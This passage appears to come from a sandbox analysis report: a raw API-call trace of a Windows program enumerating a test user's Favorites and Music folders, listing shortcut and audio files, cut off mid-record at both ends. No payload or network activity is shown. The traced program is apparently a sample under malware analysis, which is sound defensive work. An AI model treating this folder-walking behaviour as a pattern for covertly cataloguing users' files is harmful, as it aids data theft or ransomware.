hFindFile=0x670618) returned 1 [0094.314] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0094.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0094.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.315] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.315] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.315] PathFindFileNameW (pszPath="") returned="" [0094.315] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.317] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.317] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0094.317] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0094.317] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0094.317] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0094.317] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0094.317] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0094.317] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.318] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.318] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0094.318] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0094.319] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.319] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.319] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.319] PathFindFileNameW (pszPath="") returned="" [0094.319] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.320] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.320] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0094.320] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0094.320] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0094.320] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0094.320] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0094.320] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0094.320] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0094.320] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.321] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.321] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0094.321] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0094.321] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.321] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.321] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.322] PathFindFileNameW (pszPath="") returned="" [0094.322] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.323] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.323] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0094.323] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0094.323] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0094.323] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0094.323] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0094.323] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.324] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.324] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\") returned="jnsPq9bVvOwQR\\" [0094.324] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0094.324] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.324] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.324] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.324] PathFindFileNameW (pszPath="") returned="" [0094.324] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jnsPq9bVvOwQR\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad578d80, ftCreationTime.dwHighDateTime=0x1d5bb7d, ftLastAccessTime.dwLowDateTime=0x18cfc610, ftLastAccessTime.dwHighDateTime=0x1d5bbcc, ftLastWriteTime.dwLowDateTime=0x18cfc610, ftLastWriteTime.dwHighDateTime=0x1d5bbcc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.325] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad578d80, ftCreationTime.dwHighDateTime=0x1d5bb7d, ftLastAccessTime.dwLowDateTime=0x18cfc610, ftLastAccessTime.dwHighDateTime=0x1d5bbcc, ftLastWriteTime.dwLowDateTime=0x18cfc610, ftLastWriteTime.dwHighDateTime=0x1d5bbcc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.325] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6f13da0, ftCreationTime.dwHighDateTime=0x1d5b67e, ftLastAccessTime.dwLowDateTime=0x5cd81430, ftLastAccessTime.dwHighDateTime=0x1d5b59f, ftLastWriteTime.dwLowDateTime=0x5cd81430, ftLastWriteTime.dwHighDateTime=0x1d5b59f, nFileSizeHigh=0x0, nFileSizeLow=0x775c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5YAPOd5GhH.mp3", cAlternateFileName="5YAPOD~1.MP3")) returned 1 [0094.325] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6438620, ftCreationTime.dwHighDateTime=0x1d5b9b9, ftLastAccessTime.dwLowDateTime=0xcfec32e0, ftLastAccessTime.dwHighDateTime=0x1d5bd0f, ftLastWriteTime.dwLowDateTime=0xcfec32e0, ftLastWriteTime.dwHighDateTime=0x1d5bd0f, nFileSizeHigh=0x0, nFileSizeLow=0x29eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6-Y7 L9pq1hTh36.m4a", cAlternateFileName="6-Y7L9~1.M4A")) returned 1 [0094.325] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47af760, ftCreationTime.dwHighDateTime=0x1d5c5c9, ftLastAccessTime.dwLowDateTime=0x5ef430f0, ftLastAccessTime.dwHighDateTime=0x1d5c125, ftLastWriteTime.dwLowDateTime=0x5ef430f0, ftLastWriteTime.dwHighDateTime=0x1d5c125, nFileSizeHigh=0x0, nFileSizeLow=0xbffa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6LkDjRHqx5diGXRVJZ-E.wav", cAlternateFileName="6LKDJR~1.WAV")) returned 1 [0094.325] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2cd18b0, ftCreationTime.dwHighDateTime=0x1d5b99a, ftLastAccessTime.dwLowDateTime=0x82868b10, ftLastAccessTime.dwHighDateTime=0x1d5be34, ftLastWriteTime.dwLowDateTime=0x82868b10, ftLastWriteTime.dwHighDateTime=0x1d5be34, nFileSizeHigh=0x0, nFileSizeLow=0xbfdb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d0KBQhm-SGZjCX4Wq_U.wav", cAlternateFileName="D0KBQH~1.WAV")) returned 1 [0094.325] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d414780, ftCreationTime.dwHighDateTime=0x1d5c116, ftLastAccessTime.dwLowDateTime=0xade23310, ftLastAccessTime.dwHighDateTime=0x1d5c198, ftLastWriteTime.dwLowDateTime=0xade23310, ftLastWriteTime.dwHighDateTime=0x1d5c198, nFileSizeHigh=0x0, nFileSizeLow=0x16f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LdKdxLYR8KiGRAR71qNv.wav", cAlternateFileName="LDKDXL~1.WAV")) returned 1 [0094.325] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc25f60, ftCreationTime.dwHighDateTime=0x1d5c3ca, ftLastAccessTime.dwLowDateTime=0x5545d450, ftLastAccessTime.dwHighDateTime=0x1d5bdce, ftLastWriteTime.dwLowDateTime=0x5545d450, ftLastWriteTime.dwHighDateTime=0x1d5bdce, nFileSizeHigh=0x0, nFileSizeLow=0x1826, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rs3sb2G 3uKXzeiC9.wav", cAlternateFileName="RS3SB2~1.WAV")) returned 1 [0094.325] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3cfa800, ftCreationTime.dwHighDateTime=0x1d5c4f9, ftLastAccessTime.dwLowDateTime=0xae7aff90, ftLastAccessTime.dwHighDateTime=0x1d5c428, ftLastWriteTime.dwLowDateTime=0xae7aff90, ftLastWriteTime.dwHighDateTime=0x1d5c428, nFileSizeHigh=0x0, nFileSizeLow=0xeed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_8eq_R6KO9bKaTf.wav", cAlternateFileName="_8EQ_R~1.WAV")) returned 1 [0094.325] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3cfa800, ftCreationTime.dwHighDateTime=0x1d5c4f9, ftLastAccessTime.dwLowDateTime=0xae7aff90, ftLastAccessTime.dwHighDateTime=0x1d5c428, ftLastWriteTime.dwLowDateTime=0xae7aff90, ftLastWriteTime.dwHighDateTime=0x1d5c428, nFileSizeHigh=0x0, nFileSizeLow=0xeed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_8eq_R6KO9bKaTf.wav", cAlternateFileName="_8EQ_R~1.WAV")) returned 0 [0094.325] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.325] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.325] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\") returned="vzirrPIdRoa4G1GJ\\" [0094.325] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0094.325] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.326] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.326] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.326] PathFindFileNameW (pszPath="") returned="" [0094.326] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vzirrPIdRoa4G1GJ\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14e70f70, ftCreationTime.dwHighDateTime=0x1d5be17, ftLastAccessTime.dwLowDateTime=0x7708e7a0, ftLastAccessTime.dwHighDateTime=0x1d5be49, ftLastWriteTime.dwLowDateTime=0x7708e7a0, ftLastWriteTime.dwHighDateTime=0x1d5be49, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.326] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14e70f70, ftCreationTime.dwHighDateTime=0x1d5be17, ftLastAccessTime.dwLowDateTime=0x7708e7a0, ftLastAccessTime.dwHighDateTime=0x1d5be49, ftLastWriteTime.dwLowDateTime=0x7708e7a0, ftLastWriteTime.dwHighDateTime=0x1d5be49, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.326] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x668f96b0, ftCreationTime.dwHighDateTime=0x1d5c3b9, ftLastAccessTime.dwLowDateTime=0xabdc100, ftLastAccessTime.dwHighDateTime=0x1d5bfa3, ftLastWriteTime.dwLowDateTime=0xabdc100, ftLastWriteTime.dwHighDateTime=0x1d5bfa3, nFileSizeHigh=0x0, nFileSizeLow=0x114d5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="28dTIfQ.m4a", cAlternateFileName="")) returned 1 [0094.326] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75052dc0, ftCreationTime.dwHighDateTime=0x1d5be5c, ftLastAccessTime.dwLowDateTime=0xb786e350, 